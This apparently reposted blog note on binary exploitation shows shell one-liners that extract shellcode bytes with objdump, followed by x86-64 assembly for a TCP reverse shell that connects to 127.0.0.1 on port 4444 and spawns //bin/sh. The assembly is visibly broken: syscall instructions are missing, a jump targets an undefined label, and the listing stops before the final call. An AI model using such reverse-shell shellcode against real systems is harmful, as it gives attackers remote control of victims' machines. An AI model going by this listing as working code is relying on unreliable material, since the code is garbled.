Shellcodes for Binary Exploitation
2023-5-28 04:14:0 Author:查看原文) 阅读量:33 收藏

Get shellcode of the binary using objdump 

objdump -d ./Exit.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'

Output: "\x48\x31\xc0\xb0\x3c\x48\x31\xff\x0f\x05"

for i in $(objdump -d Exit.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo


X86/64-bit TCP Reverse Shell 

#Compile and get Shellcode
nasm -f elf64 stack.nasm -o stack.o
objdump -M intel -D stack.o
ld stack.o -o stack
for i in $(objdump -D ./rev |grep "^ " |cut -f2); do echo -n '\x'$i; done; echo

$Shell starts here

section .text
global _start


; clearing rax, rdi, rsi, rdx
xor rax, rax
xor rdi, rdi
xor rsi, rsi
xor rdx, rdx

add rax, 41 ;syscall number for socket
add rdi, 2
add rsi, 1

mov rdi, rax

; preparing structure for connect
; IP - - 0x0101017F; 1 - 01, 127 -7F
push 0x0100007f
; Port 9999 - 270F - 0x0f27
; Port 4444 - 115c - 0x5c11
push word 0x5c11
push word 0x2

mov rsi, rsp
add rdx, 0x10
xor rax, rax
add rax, 42

xor rsi, rsi
add rsi, 2
		xor rax, rax
		add rax, 33
		dec rsi
		jns loop

xor rax, rax
mov rdx, rax    ; NULL for argument 3
mov rsi, rdx     ;NULL for argument 2

push rax
mov rbx, 0x68732f6e69622f2f
push rbx
mov rdi, rsp

add rax, 59